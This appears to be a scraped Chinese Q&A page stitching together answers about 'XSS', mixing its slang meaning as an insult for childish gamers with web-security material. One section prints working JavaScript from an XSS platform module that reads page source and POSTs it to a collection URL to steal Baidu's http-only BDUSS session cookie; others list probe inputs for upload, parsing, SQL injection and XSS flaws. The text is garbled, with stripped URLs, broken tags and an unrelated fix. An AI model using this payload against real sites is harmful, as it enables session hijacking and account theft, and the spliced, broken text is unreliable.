目录介绍：

• 1、最近网上流行的XSS是什么意思
• 2、xss老滚打不开
• 3、如何通过 XSS 获取受 http-only さcookie
• 4、XSS是什么
• 5、找网站漏洞非得用软件吗请详细说一下谢谢
• 6、XSS攻击原理是什么

最近网上流行的XSS是什么意思

最近网上流行的XSS是小学生的恶称，骂小学生的。

一是指某些人的想法、思维方式、对事物的认知和思考能力如孩子般幼稚、单纯、天真。

二是特指某类相对于同龄的人，在游戏竞技或者社交网络中， 态度傲慢、技术水准较差、拒绝与队友沟通、独断专行、忽视团队合作、甚至喜欢恶语相向的网游玩家。

三是指对没有接触过社会或社会经验不足。

扩展资料：

1、小学生技术菜，爱骂人，玻璃心（说他一句就挂机送人头，不管说什么，比如：中路的你不要再送了，然后他就说“我就送”，接着就开始了。）小学生的心思就像星空，摸不着猜不透。

2、大喷子（网络中对喜欢肆意谩骂、地域黑、招黑、互黑等网友的一种广泛性定义。），不分青红皂白就开喷。

3、说话不经过大脑考虑，以自我为中心，可能是在家被宠惯了。

4、没有接触过社会大家庭或接触社会经验不足。比如：参加工作，你要是不让新人上，永远都是新人。这也是小学生。

xss老滚打不开

解决方法如下

1.点击计算机开始菜单,再选择“控制面板”选项。2.点击“Internet选项”按钮。3.选择“安全”选项并且点击“自定义级别”按钮。4.点击XSS筛选器的启用按钮即可

如何通过 XSS 获取受 http-only さcookie

该测试页返回了完整的http头，其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段，同时该字段是受http-only保护的，百度SRC之前也因此下调了XSS的评分标准。

02.jpg

这样，我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:

code 区域

var u = ';id={projectId}';

var cr;

if (document.charset) {

cr = document.charset

} else if (document.characterSet) {

cr = document.characterSet

};

function createXmlHttp() {

if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest()

} else {

var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');

for (var n = 0; n MSXML.length; n++) {

try {

xmlHttp = new ActiveXObject(MSXML[n]);

break

} catch(e) {}

}

}

}

createXmlHttp();

xmlHttp.onreadystatechange = writeSource;

xmlHttp.open("GET", "", true);

xmlHttp.send(null);

function postSource(cc) {

createXmlHttp();

url = u;

cc = "mycode=" + cc;

xmlHttp.open("POST", url, true);

xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlHttp.setRequestHeader("Content-length", cc.length);

xmlHttp.setRequestHeader("Connection", "close");

xmlHttp.send(cc)

}

function writeSource() {

if (xmlHttp.readyState == 4) {

var c = new postSource(xmlHttp.responseText)

}

}

由于是用xmlHttpRequest的形式读源码，且 的 Access-Control-Allow-Origin 为空，即默认不允许跨域，所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。

我在 中有提到， 可以自由构造XSS。我们向该页面写入如下代码:

code 区域

titlewooyun.org/title

p超威蓝猫@wooyun.org/p

script src=;/script

XSS是什么

1、XSS是跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。

2、恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的。

3、XSS攻击分成两类，一类是来自内部的攻击，主要指的是利用程序自身的漏洞，构造跨站语句，如:dvbbs的showerror.asp存在的跨站漏洞。

4、另一类则是来自外部的攻击，主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当要渗透一个站点，自己构造一个有跨站漏洞的网页，然后构造跨站语句，通过结合其它技术，如社会工程学等，欺骗目标服务器的管理员打开。

找网站漏洞非得用软件吗请详细说一下谢谢

网站漏洞可以手工找，也可以使用工具（如，WVS），但有些时候使用工具扫描漏洞的数据会被目标网站的安全设备过滤，这时候可以用手工试试。

漏洞：1、文件上传漏洞：web网站通常会有上传文件的功能，如：可以上传图片做头像、可以在个人网站发布zip压缩包、可以在招聘网站上传DOC、DOCX等格式的简历，只要web网站允许上传文件就有可能存在上传漏洞。如果没有对上传文件格式、大小做限制或者限制被绕过，就可以上传热议文件和可执行的脚本文件等。测试:找到上传文件的地方，试着上传一个可执行文件，若可以上传，则说明该网站存在上传漏洞；

.2、解析漏洞：web服务器对HTTP请求处理不当，将非可执行的脚本、文件等当做可执行的脚本、文件去执行。解析漏洞常和文件上传漏洞一起用。如，Apache的文件解析漏洞：Apache从右到左读取数据，会跳过无法识别的文件后缀名，如，XXX.php.随便一个后缀名，Apache就会把该文件当作XXX.php去执行。Nginx的解析漏洞(8.03版本)：访问，Nginx会将xx.jpg文件当作xx.php执行。可以将攻击脚本文件的后缀名改为.jpg或其他网站可上传的文件格式，再访问该文件加上%00.php或其他可执行的后缀名，就可以使目标网站执行构造的攻击代码。

需要知道目标网站的中间件、中间件的版本等，通过信息收集阶段解决。

测试：在url中，在文件夹目录下输入带有.asp等可执行脚本文件后缀为后缀的文件夹，或输入类似xx.asp;.jpg，看其是否执行，执行则存在文件解析漏洞。

3、SQL注入漏洞：网站没有对用户提交的参数做过滤或者过滤被限制，执行了用户提交参数里携带的恶意SQL语句。

测试：在URL后面输入 and 1=1 或者 and 1=2回车，如果还是能够正常登录此网页，而没有提示“非法字符”或者提示“非法字符”等类似的字样就说明此网站能够SQL注入。

4、XSS漏洞：可以注入恶意的HTML/Javascript语句。

测试：网页的输入点，输入scriptalert（“xss”)/script，有弹窗弹出则证明存在xss漏洞

等。

XSS攻击原理是什么

Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码，当用户浏览该页或者进行某些操作时，攻击者利用用户对原网站的信任，诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。

比如：攻击者在论坛中放一个看似安全的链接，骗取用户点击后，窃取cookie中的用户私密信息；或者攻击者在论坛中加一个恶意表单，当用户提交表单的时候，却把信息传送到攻击者的服务器中，而不是用户原本以为的信任站点。

诸如此类，唯一能完全杜绝xss攻击的方法，就是禁用script，img等，显然这是不靠谱的，用户需要丰富的页面内容；当然我们可以用一些方法预防xss攻击，尽量减少xss造成的危害。

XSS攻击的危害包括

盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号

控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力

盗窃企业重要的具有商业价值的资料

非法转账

强制发送电子邮件

网站挂马

控制受害者机器向其它网站发起攻击